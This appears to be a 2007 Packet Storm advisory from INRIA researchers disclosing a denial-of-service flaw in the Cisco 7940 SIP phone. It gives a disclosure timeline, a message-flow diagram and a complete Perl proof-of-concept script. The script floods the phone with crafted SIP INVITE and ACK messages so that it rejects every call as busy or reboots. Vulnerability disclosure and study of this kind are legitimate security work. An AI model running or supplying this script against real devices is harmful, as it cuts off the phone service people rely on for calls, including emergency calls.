cisco7940-dos.txt

2007-12-06T00:00:00
ID PACKETSTORM:61522
Type packetstorm
Reporter Radu State
Modified 2007-12-06T00:00:00

Description

                                        
                                            `Cisco 7940 Denial of Service Vulnerability  
  
  
  
Hardware:  
  
Cisco 7940 SIP Phone  
  
  
  
Severity:  
  
High – Denial of Service  
  
  
  
Software:  
  
Affected version: P0S3-08-7-00  
  
Other Versions: May be  
  
  
  
Notification:  
  
Vulnerability found: 30 August 2007  
  
Contact Cisco: 31 August 2007  
  
Tracked issue: 11 September 2007  
  
  
  
Vulnerability Synopsis:  
  
  
  
Initiating a sequence of SIP INVITE transactions leads the device to a state  
where it looks functional but it is not able to receive nor to start calls.  
If the sequence of INVITE continues, the device will reboot. In the first  
case, the period of time where the device is exposed to a DoS is about 3  
minutes, but sending new INVITE transactions, at certain intervals, will  
keep the target under DoS.  
  
  
  
In order to generate the SIP INVITE transactions that lead the device to  
such state, the Request-URI of the message should not have a user name (i.e.  
"INVITE sip:XXX.XXX.XXX.XXX SIP/2.0"). In order to drive the device to a DoS  
state only 6 transactions are required as the traffic displayed below.  
  
  
  
X ----------------------- INVITE (Call-ID #1) -----------------------> Cisco  
7940  
  
X <------------------ 100 Trying (Call-ID #1) --------------------- Cisco  
7940  
  
....  
  
--------5 New Dialogs like the previous--------  
  
....  
  
X ----------------------- INVITE (Call-ID #7) -----------------------> Cisco  
7940  
  
X <------------------ 486 Busy (Call-ID #7) --------------------- Cisco 7940  
  
  
  
-------- DoS for aproximatly 3 minutes ------  
  
  
  
X <------------------ 486 Busy (Call-ID #1) --------------------- Cisco 7940  
  
  
X <------------------ 486 Busy (Call-ID #2) --------------------- Cisco 7940  
  
  
X <------------------ 486 Busy (Call-ID #3) --------------------- Cisco 7940  
  
X <------------------ 486 Busy (Call-ID #4) --------------------- Cisco 7940  
  
X <------------------ 486 Busy (Call-ID #5) --------------------- Cisco 7940  
  
  
X <------------------ 486 Busy (Call-ID #6) --------------------- Cisco 7940  
  
  
  
Effect:  
  
If the sequence of INVITE transactions continues, the device reboots.  
  
Otherwise, the device can be permanently put under DoS by sending INVITE  
transactions at certain intervals.  
  
In such case the device replies busy to any incoming call and return busy to  
any call made by the user.  
  
However, the device maintains its connectivity with its registrar by sending  
the REGISTER transaction.  
  
  
  
Impact:  
  
Knowing the userid and IP address of the target:  
  
A remote user can crash the phone  
  
DoS can performed by sending the packets at regular intervals  
  
  
  
Proof of Concept:  
  
A perl script stateful-cisco-8.7.pl) is attached to this mail.  
  
  
  
Command:  
  
perl stateful-cisco-8.7.pl <username> <dst_IP> <SourceIp> <sourceport> Eg.  
perl stateful-cisco-8.7.pl 192.168.1.7 7940-1 192.168.1.2 tucu  
  
  
  
Credits:  
  
Humberto J. Abdelnur (Ph.D Student)  
  
Radu State (Ph.D)  
  
Olivier Festor (Ph.D)  
  
  
  
This vulnerability was identified by the Madynes research team at INRIA  
Lorraine, using KiF the Madynes VoIP fuzzer.  
  
HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr/  
  
  
  
  
  
#!/usr/bin/perl  
  
  
  
###############################  
  
# Vulnerabily discovered using KiF ~ Kiph  
  
#  
  
# Authors:  
  
# Humberto J. Abdelnur (Ph.D Student)  
  
# Radu State (Ph.D)  
  
# Olivier Festor (Ph.D)  
  
#  
  
# Madynes Team, LORIA - INRIA Lorraine  
  
# HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr  
  
###############################  
  
  
  
use IO::Socket::INET;  
  
use String::Random;  
  
  
  
die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"   
  
unless ($ARGV[3]);  
  
  
  
$targetUser = $ARGV[1];  
  
$targetIP = $ARGV[0];  
  
  
  
$attackerUser = $ARGV[3];  
  
$attackerIP= $ARGV[2];  
  
  
  
$socket=new IO::Socket::INET->new(  
  
Proto=>'udp',  
  
PeerPort=>5060,  
  
PeerAddr=>$targetIP,  
  
LocalPort=>5060);  
  
  
  
$foo = new String::Random;  
  
  
  
$flag = 0;  
  
@calls;  
  
$threads = 0;  
  
  
  
while ($flag == 0){  
  
$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";  
  
$cseq = $foo->randregex('\d\d\d\d');  
  
  
  
$msg = "INVITE sip:$targetIP SIP/2.0\r  
  
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r  
  
From: <sip:$attackerUser\@$attackerIP>;tag=1\r  
  
To: <sip:$targetUser\@$targetIP>\r  
  
Call-ID:$callid\r  
  
CSeq: $cseq INVITE\r  
  
Max-Forwards: 70\r  
  
Contact: <sip:$attackerUser\@$attackerIP>\r  
  
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,   
  
MESSAGE\r  
  
Content-Length: 0\r  
  
\r  
  
";  
  
$socket->send($msg);  
  
  
  
$socket->recv($text,1024,0);  
  
if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){  
  
push(@calls, $callid);  
  
sleep(1);  
  
}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){  
  
if ($thread == 0){  
  
$thread = scalar(@calls);  
  
}  
  
while (scalar(@calls) ge $thread){  
  
$toTag = $cseq= $callid= $text;  
  
$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/;  
  
$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/;  
  
$cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/;  
  
  
  
$msg = "ACK sip:$targetIP SIP/2.0\r  
  
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r  
  
From: <sip:$attackerUser\@$attackerIP>;tag=1\r  
  
To: <sip:$targetUser\@$targetIP>$toTag\r  
  
Call-ID:$callid\r  
  
CSeq: $cseq ACK\r  
  
Contact: <sip:$attackerUser\@$attackerIP>\r  
  
Content-Length: 0\r  
  
\r  
  
";  
  
$socket->send($msg);  
  
$i= 0;  
  
while ($i < scalar(@calls)){  
  
if (@calls[$i] eq $callid){  
  
delete @calls[$i];  
  
}else{  
  
$i += 1;  
  
}  
  
}  
  
if (scalar(@calls) ge $thread){  
  
$socket->recv($text,1024,0);  
  
}  
  
}  
  
}  
  
}  
  
  
  
  
No virus found in this outgoing message.  
Checked by AVG Free Edition.   
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007  
19:31  
  
`